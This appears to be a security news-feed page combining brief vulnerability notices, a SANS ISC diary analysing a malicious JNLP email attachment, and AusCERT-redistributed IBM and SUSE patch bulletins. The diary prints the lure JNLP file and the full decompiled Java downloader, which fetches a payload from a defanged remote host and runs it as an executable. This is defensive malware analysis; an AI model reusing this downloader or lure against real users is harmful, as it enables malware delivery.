Hírolvasó

An update that fixes 13 vulnerabilities is now available.

An update that fixes 13 vulnerabilities is now available.

Multiple vulnerabilities have been found in Dnsmasq, the worst of which may allow remote attackers to execute arbitrary code.

An update that fixes 35 vulnerabilities is now available.

Hyweb HyCMS-J1's API fail to filter POST request parameters. Remote attackers can inject SQL syntax and execute commands without privilege.

Hyweb HyCMS-J1 backend editing function does not filter special characters. Users after log-in can inject JavaScript syntax to perform a stored XSS (Stored Cross-site scripting) attack.

When hunting, one thing that I like to learn is how attackers can be imaginative at deploying new techniques. I spotted some emails that had suspicious attachments based on the ‘.jnlp’ extension. I’m pretty sure that many people don’t know what’s their purpose and, if you don’t know them, you don’t have a look at them on your logs, SIEM, ... That makes them a good candidate to deliver malicious code!

Basically, a JNLP file[1] is... an XML file! It is created in the “Java Network Launching Protocol”. It contains all the required information to execute a Java program. Usually, it contains the address where to download the malicious applet and the initial class to run.

I did a quick analysis of one of the captured JNLP files:

<?xml version="1.0" encoding="utf-8"?> <jnlp spec="1.0+" codebase="hxxp://secured-doc-read[.]net" href="delivery.jnlp"> <information> <title>Secure Document Reader</title> <vendor>Microsoft</vendor> <homepage href="wwww.microsoft.com"/> <description>Microsoft Secure Document Reader v.4.016</description> </information> <security> <all-permissions/> </security> <resources> <j2se version="1.6+" /> <jar href="delivery.jar" /> </resources> <application-desc main-class="Secure_Document_Reader"> </application-desc> wghjs100570 </jnlp>

The syntax is easy to understand. The payload will be called ‘delivery.jar’ (line 14) and downloaded from secured-doc-read[.].net (line 2). The main class is "Secure_Document_Reader" (line 16).

I decompiled the Jar file (SHA256:a4d95b7d196a4aca87cec384c5d21a756ab75cfaee7f4a20163d02109956a6dd)[2] and was surprised to find a very simple code. Often malicious Java applets implement a RAT but here we faced the simple code of a downloader:

public class Secure_Document_Reader { static BufferedInputStream frisco415; static FileOutputStream friekiegee; static String linkage9; public static void main(final String[] array) { frisco415("hxxp://sec-doc-v[.]com/images/dsc0386234.jpg"); } public static void frisco415(final String spec) { final File file = new File(Secure_Document_Reader.linkage9); try { Secure_Document_Reader.frisco415 = new BufferedInputStream(new URL(spec).openStream()); Secure_Document_Reader.friekiegee = new FileOutputStream(Secure_Document_Reader.linkage9); final byte[] array = new byte[1024]; int read; while ((read = Secure_Document_Reader.frisco415.read(array, 0, 1024)) != -1) { Secure_Document_Reader.friekiegee.write(array, 0, read); } Secure_Document_Reader.frisco415.close(); Secure_Document_Reader.friekiegee.close(); } catch (Exception ex) {} try { Desktop.getDesktop().open(file); } catch (Exception ex2) {} } static { Secure_Document_Reader.frisco415 = null; Secure_Document_Reader.friekiegee = null; Secure_Document_Reader.linkage9 = "C:\\ProgramData\\videodrv.exe"; } }

The next stage is download from hxxp://sec-doc-v[.]com/images/dsc0386234.jpg and dropped on disk as 'videodrx.exe". The PE file (SHA256:ceaf771da5e2678ed0d5844282bf0d464207c23842a8e36be3e7ab1df022ef89) has a VT score of 14/59[3].

The usage of .jnlp files is a great way to bypass the first line of defenses (mail filters) because .jnlp files are text files and do not contain any executable code. Note that Java must be installed on the victim's computer to handle .jnlp files.

[1] https://fileinfo.com/extension/jnlp
[2] https://www.virustotal.com/gui/file/a4d95b7d196a4aca87cec384c5d21a756ab75cfaee7f4a20163d02109956a6dd/detection
[3] https://www.virustotal.com/gui/file/ceaf771da5e2678ed0d5844282bf0d464207c23842a8e36be3e7ab1df022ef89/detection

Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Member only content. Please view on site after logging in.

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 =========================================================================== AUSCERT External Security Bulletin Redistribution ESB-2021.0269 Security Bulletin: Vulnerabilities in IBM Java SDK affect IBM WebSphere Cast Iron Solution & App Connect Professional 22 January 2021 =========================================================================== AusCERT Security Bulletin Summary --------------------------------- Product: IBM SDK Java Technology Edition for WebSphere Cast Iron Solution & App Connect Professional Publisher: IBM Operating System: Linux variants Impact/Access: Modify Arbitrary Files -- Remote/Unauthenticated Access Confidential Data -- Remote/Unauthenticated Resolution: Patch/Upgrade CVE Names: CVE-2020-2590 Reference: ASB-2020.0028 ESB-2020.4463 ESB-2020.4416 ESB-2020.3230 ESB-2020.2824 Original Bulletin: https://www.ibm.com/support/pages/node/6406640 - --------------------------BEGIN INCLUDED TEXT-------------------- Vulnerabilities in IBM Java SDK affect IBM WebSphere Cast Iron Solution & App Connect Professional Document Information Document number : 6406640 Modified date : 21 January 2021 Product : App Connect Professional Component : - Software version : - Operating system(s): Linux Summary Vulnerabilities in IBM SDK Java Technology Edition, used by IBM WebSphere Cast Iron Solution & App Connect Professional These issues were disclosed as part of the IBM Java SDK updates in Jan 2020. IBM WebSphere Cast Iron Solution & App Connect Professional has addressed the applicable CVEs Vulnerability Details CVEID: CVE-2020-2590 DESCRIPTION: An unspecified vulnerability in Java SE related to the Java SE Security component could allow an unauthenticated attacker to cause no confidentiality impact, low integrity impact, and no availability impact. CVSS Base score: 3.7 CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/ 174538 for the current score. CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N) Affected Products and Versions WebSphere Cast Iron v 7.5.0.0, 7.5.0.1, 7.5.1.0 WebSphere Cast Iron v 7.0.0.0, 7.0.0.1, 7.0.0.2 App Connect Professional v 7.5.2.0 App Connect Professional v 7.5.3.0 App Connect Professional v 7.5.4.0 Remediation/Fixes +------------------------+-------+-------+---------------------+ |Product |VRMF |APAR |Remediation/First Fix| +------------------------+-------+-------+---------------------+ | |7.0.0.0| | | |IBM WebSphere Cast Iron |7.0.0.1|LI81778|7002 Fixcentral Link | | |7.0.0.2| | | +------------------------+-------+-------+---------------------+ | |7.5.0.0| | | |IBM WebSphere Cast Iron |7.5.0.1|LI81778|7510 fixcentral Link | | |7.5.1.0| | | +------------------------+-------+-------+---------------------+ |App Connect Professional|7.5.2.0|LI81778|7520 Fixcentral link | +------------------------+-------+-------+---------------------+ |App Connect Professional|7.5.3.0|LI81778|7530 Fixcentral link | +------------------------+-------+-------+---------------------+ |App Connect Professional|7.5.4.0|LI81778|7540 Fixcentral link | +------------------------+-------+-------+---------------------+ Workarounds and Mitigations None Get Notified about Future Security Bulletins References Complete CVSS v3 Guide On-line Calculator v3 Off Change History 19 Jan 2021: Initial Publication Document Location Worldwide - --------------------------END INCLUDED TEXT-------------------- You have received this e-mail bulletin as a result of your organisation's registration with AusCERT. The mailing list you are subscribed to is maintained within your organisation, so if you do not wish to continue receiving these bulletins you should contact your local IT manager. If you do not know who that is, please send an email to auscert@auscert.org.au and we will forward your request to the appropriate person. NOTE: Third Party Rights This security bulletin is provided as a service to AusCERT's members. As AusCERT did not write the document quoted above, AusCERT has had no control over its content. The decision to follow or act on information or advice contained in this security bulletin is the responsibility of each user or organisation, and should be considered in accordance with your organisation's site policies and procedures. AusCERT takes no responsibility for consequences which may arise from following or acting on information or advice contained in this security bulletin. NOTE: This is only the original release of the security bulletin. It may not be updated when updates to the original are made. If downloading at a later date, it is recommended that the bulletin is retrieved directly from the author's website to ensure that the information is still current. Contact information for the authors of the original document is included in the Security Bulletin above. If you have any questions or need further information, please contact them directly. Previous advisories and external security bulletins can be retrieved from: https://www.auscert.org.au/bulletins/ =========================================================================== Australian Computer Emergency Response Team The University of Queensland Brisbane Qld 4072 Internet Email: auscert@auscert.org.au Facsimile: (07) 3365 7031 Telephone: (07) 3365 4417 (International: +61 7 3365 4417) AusCERT personnel answer during Queensland business hours which are GMT+10:00 (AEST). On call after hours for member emergencies only. =========================================================================== -----BEGIN PGP SIGNATURE----- Comment: http://www.auscert.org.au/render.html?it=1967 iQIVAwUBYAphzONLKJtyKPYoAQgMnhAAlFdImVXxCZ/FL5fdanFonyMakCNzmqUC qeoVDZ7WVcZ5cgtylsesZVJpTUufEIE/7hPnksVoFIm1uAzcWBvfw5yYpShi3DKP cWoa3yE3hJpbc4aLQyA1d+NrTNiAAoLKTIUncRlQYkbMbQ66ghEFVjndjPUF/TAZ pzc2zNvkSVyutdODqEYyzkHEnGPMmAi1Dr769AZL7BTjnIeEjW4yFnZkkiWxIYxv 7cIms5n7aZ560cKP/GJawl+6WpHN7DMQgnUoVb37jAlpqFuMSzV0OhOviyb8mbLz /kbP00PdixNME/BwkATZ40ufbCH7ppILZknXJawQT6H9xXID8PyLNcjyy/3wedcn rq321x0DRz2RSmdzh0k6qGLOHGT9od/0JBwlVhgmPtnCdVzqVX0uMDl5Utf7UFPq ELrZov2bVQxS4WiX0jiEWhzk7mqmmBOeO8FYiILRJrnpaC65AFTZ5/6rmpKaEaAI tiVVy6fvFh7vrpxDOFnEZjsFZkMSFbvCuD/OmK8yXj4/pWH4w95/ROcMPTwghUZM D30jF4XCI2xSm0OUDndjfi2wtcNsbYhbINhjVuPh+QWK8rPJWqj1D4956gbDrE5s hzTblwgrQpggl+L1jm4idTbLADDtWJ26TJhtBhUgLiLRdj7bzdRgP/meSKq2BNWW uRJbFCBRPxI= =Zscw -----END PGP SIGNATURE-----

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 =========================================================================== AUSCERT External Security Bulletin Redistribution ESB-2021.0268 Security update for gdk-pixbuf 22 January 2021 =========================================================================== AusCERT Security Bulletin Summary --------------------------------- Product: gdk-pixbuf Publisher: SUSE Operating System: SUSE Impact/Access: Denial of Service -- Remote with User Interaction Resolution: Patch/Upgrade CVE Names: CVE-2020-29385 Original Bulletin: https://www.suse.com/support/update/announcement/2021/suse-su-20210184-1 - --------------------------BEGIN INCLUDED TEXT-------------------- SUSE Security Update: Security update for gdk-pixbuf ______________________________________________________________________________ Announcement ID: SUSE-SU-2021:0184-1 Rating: moderate References: #1174307 #1180393 Cross-References: CVE-2020-29385 Affected Products: SUSE Linux Enterprise Module for Desktop Applications 15-SP2 SUSE Linux Enterprise Module for Basesystem 15-SP2 ______________________________________________________________________________ An update that solves one vulnerability and has one errata is now available. Description: This update for gdk-pixbuf fixes the following issues: o CVE-2020-29385: Fixed an infinite loop in lzw.c in the function write_indexes (bsc#1180393). o Fixed an integer underflow in the GIF loader (bsc#1174307). Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: o SUSE Linux Enterprise Module for Desktop Applications 15-SP2: zypper in -t patch SUSE-SLE-Module-Desktop-Applications-15-SP2-2021-184=1 o SUSE Linux Enterprise Module for Basesystem 15-SP2: zypper in -t patch SUSE-SLE-Module-Basesystem-15-SP2-2021-184=1 Package List: o SUSE Linux Enterprise Module for Desktop Applications 15-SP2 (x86_64): gdk-pixbuf-debugsource-2.40.0-3.3.1 gdk-pixbuf-query-loaders-32bit-2.40.0-3.3.1 gdk-pixbuf-query-loaders-32bit-debuginfo-2.40.0-3.3.1 libgdk_pixbuf-2_0-0-32bit-2.40.0-3.3.1 libgdk_pixbuf-2_0-0-32bit-debuginfo-2.40.0-3.3.1 o SUSE Linux Enterprise Module for Basesystem 15-SP2 (aarch64 ppc64le s390x x86_64): gdk-pixbuf-debugsource-2.40.0-3.3.1 gdk-pixbuf-devel-2.40.0-3.3.1 gdk-pixbuf-devel-debuginfo-2.40.0-3.3.1 gdk-pixbuf-query-loaders-2.40.0-3.3.1 gdk-pixbuf-query-loaders-debuginfo-2.40.0-3.3.1 gdk-pixbuf-thumbnailer-2.40.0-3.3.1 gdk-pixbuf-thumbnailer-debuginfo-2.40.0-3.3.1 libgdk_pixbuf-2_0-0-2.40.0-3.3.1 libgdk_pixbuf-2_0-0-debuginfo-2.40.0-3.3.1 typelib-1_0-GdkPixbuf-2_0-2.40.0-3.3.1 typelib-1_0-GdkPixdata-2_0-2.40.0-3.3.1 o SUSE Linux Enterprise Module for Basesystem 15-SP2 (noarch): gdk-pixbuf-lang-2.40.0-3.3.1 References: o https://www.suse.com/security/cve/CVE-2020-29385.html o https://bugzilla.suse.com/1174307 o https://bugzilla.suse.com/1180393 - --------------------------END INCLUDED TEXT-------------------- You have received this e-mail bulletin as a result of your organisation's registration with AusCERT. The mailing list you are subscribed to is maintained within your organisation, so if you do not wish to continue receiving these bulletins you should contact your local IT manager. If you do not know who that is, please send an email to auscert@auscert.org.au and we will forward your request to the appropriate person. NOTE: Third Party Rights This security bulletin is provided as a service to AusCERT's members. As AusCERT did not write the document quoted above, AusCERT has had no control over its content. The decision to follow or act on information or advice contained in this security bulletin is the responsibility of each user or organisation, and should be considered in accordance with your organisation's site policies and procedures. AusCERT takes no responsibility for consequences which may arise from following or acting on information or advice contained in this security bulletin. NOTE: This is only the original release of the security bulletin. It may not be updated when updates to the original are made. If downloading at a later date, it is recommended that the bulletin is retrieved directly from the author's website to ensure that the information is still current. Contact information for the authors of the original document is included in the Security Bulletin above. If you have any questions or need further information, please contact them directly. Previous advisories and external security bulletins can be retrieved from: https://www.auscert.org.au/bulletins/ =========================================================================== Australian Computer Emergency Response Team The University of Queensland Brisbane Qld 4072 Internet Email: auscert@auscert.org.au Facsimile: (07) 3365 7031 Telephone: (07) 3365 4417 (International: +61 7 3365 4417) AusCERT personnel answer during Queensland business hours which are GMT+10:00 (AEST). On call after hours for member emergencies only. =========================================================================== -----BEGIN PGP SIGNATURE----- Comment: http://www.auscert.org.au/render.html?it=1967 iQIVAwUBYApeQuNLKJtyKPYoAQi+Ow/9FHiddIfdczsNinCv51fF8rHVUi6Odvx4 5i4A1EiaNdvX+iY23I7kSnsVUXYusJGRo1/PbqMzC8VHVFfogJJwiwo4SeBO1BVE M9/Dc6k/Y2wKknhuxfS85byrLPhH6O8hBXF6y8rhpIZYqfuB9/Wl60NcD7qW/4A9 Z8qtObE/aQxdyMJ5kd2qlA11KaEF5ktQW8+GTIKQ1wBGt76dYcbBzSQ6yYcz+Eyo cTkBRe4sjpye9tjFpSnNgLjwHVSU4AXwOFlwu+94ffD2T60lZ4nEYruH0IUJLvGG 9r6QBgZOzTX/kbBbW5WnvJJZ7qoxY5OqNlIjZCjLrCuP1WzF5WIgPpWUNbnaUST3 kOqBg4bAWj1dpWHFCRfUyaVnsvHSdLfa9HzDvKM/Y+sIO6IEbbNNn2t6zx78Nap9 0mNHALmnG3+sahGS6M1JH9mjfkWqzjJIVsszkxg4NZRzJa4V5LpuHC7OC7GH/iwF 2G5BvFPb2W+JUFLzZvHw9pZNZxSoQoCKMi2rsizbqwJYt1V3NOJlKsYL1ZuZR/+Y oJo2zTixPVCDGvePS5XoLeIZFOXM0uSgKez8CSVL2eYNv8vac96nUlPADljnX5tZ Iq8GQ0J0GawTiZ081EY/3iDmNg/5ZxJx8zrvfn2saCZei0P5VZdK8wgcqDo5UpMq WDQpNQ179rc= =5akf -----END PGP SIGNATURE-----

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 =========================================================================== AUSCERT External Security Bulletin Redistribution ESB-2021.0267 Security update for perl-Convert-ASN1 22 January 2021 =========================================================================== AusCERT Security Bulletin Summary --------------------------------- Product: perl-Convert-ASN1 Publisher: SUSE Operating System: SUSE Impact/Access: Denial of Service -- Remote/Unauthenticated Resolution: Patch/Upgrade CVE Names: CVE-2013-7488 Reference: ESB-2021.0256 Original Bulletin: https://www.suse.com/support/update/announcement/2021/suse-su-20210183-1 - --------------------------BEGIN INCLUDED TEXT-------------------- SUSE Security Update: Security update for perl-Convert-ASN1 ______________________________________________________________________________ Announcement ID: SUSE-SU-2021:0183-1 Rating: moderate References: #1168934 Cross-References: CVE-2013-7488 Affected Products: SUSE Linux Enterprise Module for Basesystem 15-SP2 SUSE Linux Enterprise Module for Basesystem 15-SP1 ______________________________________________________________________________ An update that fixes one vulnerability is now available. Description: This update for perl-Convert-ASN1 fixes the following issue: o CVE-2013-7488: Fixed an infinite loop via unexpected input (bsc#1168934). Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: o SUSE Linux Enterprise Module for Basesystem 15-SP2: zypper in -t patch SUSE-SLE-Module-Basesystem-15-SP2-2021-183=1 o SUSE Linux Enterprise Module for Basesystem 15-SP1: zypper in -t patch SUSE-SLE-Module-Basesystem-15-SP1-2021-183=1 Package List: o SUSE Linux Enterprise Module for Basesystem 15-SP2 (noarch): perl-Convert-ASN1-0.27-1.6.2 o SUSE Linux Enterprise Module for Basesystem 15-SP1 (noarch): perl-Convert-ASN1-0.27-1.6.2 References: o https://www.suse.com/security/cve/CVE-2013-7488.html o https://bugzilla.suse.com/1168934 - --------------------------END INCLUDED TEXT-------------------- You have received this e-mail bulletin as a result of your organisation's registration with AusCERT. The mailing list you are subscribed to is maintained within your organisation, so if you do not wish to continue receiving these bulletins you should contact your local IT manager. If you do not know who that is, please send an email to auscert@auscert.org.au and we will forward your request to the appropriate person. NOTE: Third Party Rights This security bulletin is provided as a service to AusCERT's members. As AusCERT did not write the document quoted above, AusCERT has had no control over its content. The decision to follow or act on information or advice contained in this security bulletin is the responsibility of each user or organisation, and should be considered in accordance with your organisation's site policies and procedures. AusCERT takes no responsibility for consequences which may arise from following or acting on information or advice contained in this security bulletin. NOTE: This is only the original release of the security bulletin. It may not be updated when updates to the original are made. If downloading at a later date, it is recommended that the bulletin is retrieved directly from the author's website to ensure that the information is still current. Contact information for the authors of the original document is included in the Security Bulletin above. If you have any questions or need further information, please contact them directly. Previous advisories and external security bulletins can be retrieved from: https://www.auscert.org.au/bulletins/ =========================================================================== Australian Computer Emergency Response Team The University of Queensland Brisbane Qld 4072 Internet Email: auscert@auscert.org.au Facsimile: (07) 3365 7031 Telephone: (07) 3365 4417 (International: +61 7 3365 4417) AusCERT personnel answer during Queensland business hours which are GMT+10:00 (AEST). On call after hours for member emergencies only. =========================================================================== -----BEGIN PGP SIGNATURE----- Comment: http://www.auscert.org.au/render.html?it=1967 iQIVAwUBYApeNeNLKJtyKPYoAQih7hAAleLueocgz5+jeYnUlvMSL0CVzWDGhmP3 zjPRrHVjfRtkZRB8C5wnWu12ROk1jE2aJ0ffUUP3cv2cWnJ4BpfL9eAA01evjRKV C46TPEw5ZS5V7IXcZZJmlcXWW/pVqEu5KrmiXTxPJtrWpUzqrqjgOdZFjYs+PkeN WXo0E0Mbl9y4LLXB5wAUE3LdIFYGTglVwRIkn15jP6WqzPeUiFZAKMduLQPj5Wh0 8mdvyEiFzqB9JGt2q61Q7s7LzXO6Pys21JdFBU9CRW8XHNwe4Xq1iESfs8cl20xU R6LxPjUJ/7kvAJxHvecCNd7oXfbOIVK4vAUfBLP/HqeiPMnXLlLbEAmL8q87hhif 5wRePUmDPDKXnq7lBHCghlqsiIEzpYknNs7FZbCfZhBwBjYkw1Eb8dksq6OFB4c8 8wE2v8jyJW7gNKmSMWwIYzY4rSbXUuY17EAB+hyKcxsDFGe+P0boQEKqJsBuaPZk FkQ+mJjhtpNhZCf+C15/tagdc/5xnEbWGfH1Vz6U1r5mxV1XR8kUgyQ0f/eYaJTV XJW2ZnkjnXQgVCp4g7fI87qU5XSS8Y1QPy24U+s/DcQVF8+QzyZagFSTjzd6ihT/ QOWJuTvu0Cx+qfOSu/1uSR94qHVt32aSWeMNUIURw4aykj7g17LpcsI2yQj+Y+ra gBdy9F60V9o= =KMfq -----END PGP SIGNATURE-----

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 =========================================================================== AUSCERT External Security Bulletin Redistribution ESB-2021.0266 Security update for samba 22 January 2021 =========================================================================== AusCERT Security Bulletin Summary --------------------------------- Product: samba Publisher: SUSE Operating System: SUSE Impact/Access: Increased Privileges -- Existing Account Denial of Service -- Existing Account Access Confidential Data -- Existing Account Resolution: Patch/Upgrade CVE Names: CVE-2020-14383 CVE-2020-14323 CVE-2020-14318 Reference: ESB-2020.4436 ESB-2020.4143 ESB-2020.3755 Original Bulletin: https://www.suse.com/support/update/announcement/2021/suse-su-20210185-1 - --------------------------BEGIN INCLUDED TEXT-------------------- SUSE Security Update: Security update for samba ______________________________________________________________________________ Announcement ID: SUSE-SU-2021:0185-1 Rating: moderate References: #1173902 #1173994 #1177355 #1177613 #1178469 Cross-References: CVE-2020-14318 CVE-2020-14323 CVE-2020-14383 Affected Products: SUSE Enterprise Storage 7 ______________________________________________________________________________ An update that solves three vulnerabilities and has two fixes is now available. Description: This update for samba fixes the following issues: o Update to 4.13.3 + libcli: smb2: Never print length if smb2_signing_key_valid() fails for crypto blob; (bso#14210); + s3: modules: gluster. Fix the error I made in preventing talloc leaks from a function; (bso#14486); + s3: smbd: Don't overwrite contents of fsp->aio_requests[0] with NULL via TALLOC_FREE(); (bso#14515); + s3: spoolss: Make parameters in call to user_ok_token() match all other uses; (bso#14568); + s3: smbd: Quiet log messages from usershares for an unknown share; (bso#14590); + samba process does not honor max log size; (bso#14248); + vfs_zfsacl: Add missing inherited flag on hidden "magic" everyone@ ACE; (bso#14587); + s3-libads: Pass timeout to open_socket_out in ms; (bso#13124); + s3-vfs_glusterfs: Always disable write-behind translator; (bso#14486); + smbclient: Fix recursive mget; (bso#14517); + clitar: Use do_list()'s recursion in clitar.c; (bso#14581); + manpages/vfs_glusterfs: Mention silent skipping of write-behind translator; (bso#14486); + vfs_shadow_copy2: Preserve all open flags assuming ROFS; (bso#14573); + interface: Fix if_index is not parsed correctly; (bso#14514); o Update to 4.13.2 + s3: modules: vfs_glusterfs: Fix leak of char **lines onto mem_ctx on return; (bso#14486); + RN: vfs_zfsacl: Only grant DELETE_CHILD if ACL tag is special; (bso#14471); + smb.conf.5: Add clarification how configuration changes reflected by Samba; (bso#14538); + daemons: Report status to systemd even when running in foreground; (bso# 14552); + DNS Resolver: Support both dnspython before and after 2.0.0; (bso #14553); + s3-vfs_glusterfs: Refuse connection when write-behind xlator is present; (bso#14486); + provision: Add support for BIND 9.16.x; (bso# 14487); + ctdb-common: Avoid aliasing errors during code optimization; (bso #14537); + libndr: Avoid assigning duplicate versions to symbols; (bso# 14541); + docs: Fix default value of spoolss:architecture; (bso#14522); + winbind: Fix a memleak; (bso#14388); + s4:dsdb:acl_read: Implement "List Object" mode feature; (bso#14531); + docs-xml/manpages: Add warning about write-behind translator for vfs_glusterfs; (bso#14486); + nsswitch/ nsstest.c: Avoid nss function conflicts with glibc nss.h. + vfs_shadow_copy2: Avoid closing snapsdir twice; (bso#14530); + third_party: Update resolv_wrapper to version 1.1.7; (bso#14547); + examples:auth: Do not install example plugin; (bso#14550); + ctdb-recoverd: Drop unnecessary and broken code; (bso#14513); + RN: vfs_zfsacl: Only grant DELETE_CHILD if ACL tag is special; (bso#14471); o Adjust smbcacls '--propagate-inheritance' feature to align with upstream; (bsc#1178469). o Update to samba 4.13.1 + CVE-2020-14383: An authenticated user can crash the DCE/RPC DNS with easily crafted records; (bsc#1177613); (bso#14472); + CVE-2020-14323: Unprivileged user can crash winbind; (bsc#1173994); (bso# 14436); + CVE-2020-14318: Missing handle permissions check in SMB1/2/3 ChangeNotify; (bsc#1173902); (bso#14434); o Adjust systemd tmpfiles.d configuration, use /run/samba instead of /var/run /samba; (bsc#1177355); Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: o SUSE Enterprise Storage 7: zypper in -t patch SUSE-Storage-7-2021-185=1 Package List: o SUSE Enterprise Storage 7 (aarch64 x86_64): ctdb-4.13.3+git.181.fc4672a5b81-3.3.1 ctdb-debuginfo-4.13.3+git.181.fc4672a5b81-3.3.1 libdcerpc-binding0-4.13.3+git.181.fc4672a5b81-3.3.1 libdcerpc-binding0-debuginfo-4.13.3+git.181.fc4672a5b81-3.3.1 libdcerpc0-4.13.3+git.181.fc4672a5b81-3.3.1 libdcerpc0-debuginfo-4.13.3+git.181.fc4672a5b81-3.3.1 libndr-krb5pac0-4.13.3+git.181.fc4672a5b81-3.3.1 libndr-krb5pac0-debuginfo-4.13.3+git.181.fc4672a5b81-3.3.1 libndr-nbt0-4.13.3+git.181.fc4672a5b81-3.3.1 libndr-nbt0-debuginfo-4.13.3+git.181.fc4672a5b81-3.3.1 libndr-standard0-4.13.3+git.181.fc4672a5b81-3.3.1 libndr-standard0-debuginfo-4.13.3+git.181.fc4672a5b81-3.3.1 libndr1-4.13.3+git.181.fc4672a5b81-3.3.1 libndr1-debuginfo-4.13.3+git.181.fc4672a5b81-3.3.1 libnetapi0-4.13.3+git.181.fc4672a5b81-3.3.1 libnetapi0-debuginfo-4.13.3+git.181.fc4672a5b81-3.3.1 libsamba-credentials0-4.13.3+git.181.fc4672a5b81-3.3.1 libsamba-credentials0-debuginfo-4.13.3+git.181.fc4672a5b81-3.3.1 libsamba-errors0-4.13.3+git.181.fc4672a5b81-3.3.1 libsamba-errors0-debuginfo-4.13.3+git.181.fc4672a5b81-3.3.1 libsamba-hostconfig0-4.13.3+git.181.fc4672a5b81-3.3.1 libsamba-hostconfig0-debuginfo-4.13.3+git.181.fc4672a5b81-3.3.1 libsamba-passdb0-4.13.3+git.181.fc4672a5b81-3.3.1 libsamba-passdb0-debuginfo-4.13.3+git.181.fc4672a5b81-3.3.1 libsamba-util0-4.13.3+git.181.fc4672a5b81-3.3.1 libsamba-util0-debuginfo-4.13.3+git.181.fc4672a5b81-3.3.1 libsamdb0-4.13.3+git.181.fc4672a5b81-3.3.1 libsamdb0-debuginfo-4.13.3+git.181.fc4672a5b81-3.3.1 libsmbclient0-4.13.3+git.181.fc4672a5b81-3.3.1 libsmbclient0-debuginfo-4.13.3+git.181.fc4672a5b81-3.3.1 libsmbconf0-4.13.3+git.181.fc4672a5b81-3.3.1 libsmbconf0-debuginfo-4.13.3+git.181.fc4672a5b81-3.3.1 libsmbldap2-4.13.3+git.181.fc4672a5b81-3.3.1 libsmbldap2-debuginfo-4.13.3+git.181.fc4672a5b81-3.3.1 libtevent-util0-4.13.3+git.181.fc4672a5b81-3.3.1 libtevent-util0-debuginfo-4.13.3+git.181.fc4672a5b81-3.3.1 libwbclient0-4.13.3+git.181.fc4672a5b81-3.3.1 libwbclient0-debuginfo-4.13.3+git.181.fc4672a5b81-3.3.1 samba-4.13.3+git.181.fc4672a5b81-3.3.1 samba-ceph-4.13.3+git.181.fc4672a5b81-3.3.1 samba-ceph-debuginfo-4.13.3+git.181.fc4672a5b81-3.3.1 samba-client-4.13.3+git.181.fc4672a5b81-3.3.1 samba-client-debuginfo-4.13.3+git.181.fc4672a5b81-3.3.1 samba-debuginfo-4.13.3+git.181.fc4672a5b81-3.3.1 samba-debugsource-4.13.3+git.181.fc4672a5b81-3.3.1 samba-libs-4.13.3+git.181.fc4672a5b81-3.3.1 samba-libs-debuginfo-4.13.3+git.181.fc4672a5b81-3.3.1 samba-libs-python3-4.13.3+git.181.fc4672a5b81-3.3.1 samba-libs-python3-debuginfo-4.13.3+git.181.fc4672a5b81-3.3.1 samba-winbind-4.13.3+git.181.fc4672a5b81-3.3.1 samba-winbind-debuginfo-4.13.3+git.181.fc4672a5b81-3.3.1 References: o https://www.suse.com/security/cve/CVE-2020-14318.html o https://www.suse.com/security/cve/CVE-2020-14323.html o https://www.suse.com/security/cve/CVE-2020-14383.html o https://bugzilla.suse.com/1173902 o https://bugzilla.suse.com/1173994 o https://bugzilla.suse.com/1177355 o https://bugzilla.suse.com/1177613 o https://bugzilla.suse.com/1178469 - --------------------------END INCLUDED TEXT-------------------- You have received this e-mail bulletin as a result of your organisation's registration with AusCERT. The mailing list you are subscribed to is maintained within your organisation, so if you do not wish to continue receiving these bulletins you should contact your local IT manager. If you do not know who that is, please send an email to auscert@auscert.org.au and we will forward your request to the appropriate person. NOTE: Third Party Rights This security bulletin is provided as a service to AusCERT's members. As AusCERT did not write the document quoted above, AusCERT has had no control over its content. The decision to follow or act on information or advice contained in this security bulletin is the responsibility of each user or organisation, and should be considered in accordance with your organisation's site policies and procedures. AusCERT takes no responsibility for consequences which may arise from following or acting on information or advice contained in this security bulletin. NOTE: This is only the original release of the security bulletin. It may not be updated when updates to the original are made. If downloading at a later date, it is recommended that the bulletin is retrieved directly from the author's website to ensure that the information is still current. Contact information for the authors of the original document is included in the Security Bulletin above. If you have any questions or need further information, please contact them directly. Previous advisories and external security bulletins can be retrieved from: https://www.auscert.org.au/bulletins/ =========================================================================== Australian Computer Emergency Response Team The University of Queensland Brisbane Qld 4072 Internet Email: auscert@auscert.org.au Facsimile: (07) 3365 7031 Telephone: (07) 3365 4417 (International: +61 7 3365 4417) AusCERT personnel answer during Queensland business hours which are GMT+10:00 (AEST). On call after hours for member emergencies only. =========================================================================== -----BEGIN PGP SIGNATURE----- Comment: http://www.auscert.org.au/render.html?it=1967 iQIVAwUBYApb9uNLKJtyKPYoAQjb/Q//cDlXYWjhH9EpxbO7+Au91orwWdOZgzGW 2CVEFXxk2dSG+z2lMtDl/tj2+Ni9hir8Fr6mkoOdJtnnHswrc1F0KcIf9mw5LExH hLuUV5mE4fOZwIM9RMlx05mZDLgLQceEXt18k1mi6aP1mLdR8Q7Ii8Dl0gdNoiwT IxXWfoGFFZipQ4lPmnk5k8YFs2Q4qNDGuY+rtwOiTMC3y2oMWhedHARwFagxg69b iBirMXfVOQB75gzHpx+UaHk7QT5pNBHVQg4+viOC6Wzt54XCoigECGUhWSO7R2Bt OShUoFQd9cjYV7KslJYa9GgD9Y73//4HC8l86Wz8Wy8q0ai0T4u560m8vxCYj1N9 bKD5NlcgcWL6zEyDuVW1LtcRcE3XkaPRyRpDVoPzQyyq5GWe3GN915GxhRyMy9Sk o4kYQsSesxUgHbC8/0xTjP/4uvVE4nvkltttarGHB3oHRYK3P1NgY2kBUscZyR8f 